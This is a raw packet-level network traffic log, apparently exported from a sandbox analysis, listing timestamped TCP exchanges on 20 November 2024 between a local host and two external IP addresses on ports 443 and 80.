                                                                                                          Nov 20, 2024 17:18:26.921910048 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.921974897 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.922054052 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.922071934 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.925390005 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.925437927 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.925461054 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.925477028 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.925507069 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.925524950 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.925550938 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.925589085 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.925610065 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.925633907 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.927896023 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.927980900 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.927997112 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.928051949 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.928097963 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.928150892 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.930804968 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:44.005593061 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:44.187542915 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:44.187637091 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:44.187983036 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:44.307574987 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308274031 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308440924 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308454990 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308470011 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308486938 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308501959 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308516979 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308532000 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308578968 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.308590889 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308609009 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.308715105 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.430066109 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.430208921 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.430288076 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.434246063 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.484601974 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.498064995 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.498226881 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.498286009 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.500405073 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.500585079 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.500637054 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.509012938 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.509031057 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.509078026 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.517292023 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.517477989 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.517529964 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.525767088 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.526113987 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.526170969 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.534275055 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.534430027 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.534492970 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.540684938 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.540848970 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.540910006 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.549242020 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.549460888 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.549518108 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.557451963 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.559675932 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.559730053 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.565881014 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.565918922 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.565984011 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.604346037 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.604800940 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.604882956 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.608417988 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.656485081 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.690958977 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.690980911 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.691153049 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.694156885 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.694360971 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.694437027 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.698384047 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.698402882 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.698462963 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.702375889 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.702394009 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.702464104 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.709373951 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.709515095 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.709568024 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.713248014 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.713447094 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.713504076 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.714020014 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.714704990 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.714761019 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.718712091 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.719037056 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.719094038 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.723334074 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.723479986 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.723644972 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.728043079 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.728080988 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.728146076 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.732275009 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.732386112 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.732525110 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.736888885 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.737627983 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.737690926 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.741611004 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.741959095 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.742017984 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.746362925 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.746403933 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.746462107 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.750821114 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.751430035 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.751533985 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.755253077 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.755448103 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.755503893 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.760018110 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.760381937 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.760451078 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.765571117 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.812860966 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.880832911 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.880911112 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.881000996 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.881685972 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.881855965 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.882033110 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.884861946 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.884915113 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.884995937 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.887876987 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.888534069 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.888612032 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.890943050 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.891355991 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.891431093 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.894073963 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.894407034 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.894570112 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.897211075 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.897988081 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.898068905 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.900300980 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.900736094 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.900849104 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.905033112 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.905050039 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.905113935 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.907402039 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.907567978 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.907648087 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.910747051 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.910861969 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.910934925 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.913603067 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.914293051 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.914647102 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.916784048 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.917095900 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.917165995 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.919075966 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.919131041 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.919203043 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.922115088 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.922163010 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.922236919 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.925183058 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.925539017 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.925623894 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.928383112 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.929379940 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.929433107 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.931514978 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.931840897 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.931979895 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.934468031 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.934597969 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.934693098 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.937676907 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.938040972 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.938258886 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.940774918 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.940998077 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.941054106 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.943895102 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.943974018 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.944047928 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.946995020 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.947331905 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.947463989 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.950103045 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.951332092 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.951389074 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.953159094 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.953577042 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.953708887 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.956259966 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.956756115 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.956836939 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.959364891 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.000308990 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.072866917 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.072988987 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.073060036 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.074237108 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.074419975 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.074491024 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.077028990 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.078005075 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.078243017 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.078372955 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.083213091 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.083230019 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.083261967 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.084800005 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.084849119 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.085053921 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.087208986 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.087260008 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.087548971 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.089786053 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.089802027 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.089849949 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.093199015 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.093256950 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.093369007 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.095645905 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.095663071 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.095710993 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.097763062 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.097875118 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.098090887 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.100651026 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.100667953 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.100725889 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.103161097 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.103214025 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.103338003 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.105498075 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.105549097 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.105916023 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.108210087 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.108258963 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.108762980 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.110723019 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.110810041 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.111388922 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.113176107 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.113217115 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.113354921 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.115900040 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.116069078 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.116214037 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.119203091 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.119239092 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.119344950 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.119941950 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.120001078 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.120090008 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.122385025 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.122576952 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.122761965 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.124900103 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.125022888 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.125078917 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.131699085 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.131736040 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.131844997 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.133671999 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.133728981 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.134008884 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.136486053 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.136523008 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.136571884 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.138967991 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.139089108 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.139116049 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.141526937 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.141694069 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.142189980 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.144081116 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.144157887 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.144407988 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.146775007 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.146877050 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.147300005 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.149497986 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.149533033 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.149550915 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.151866913 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.151967049 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.152216911 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.154274940 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.154344082 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.154362917 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.157083988 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.157119989 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.157228947 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.157242060 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.157285929 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.157401085 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.160356998 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.160429955 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.160471916 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.162333012 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.162369013 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.162388086 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.164890051 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.164943933 CET4976580192.168.2.7192.3.220.29
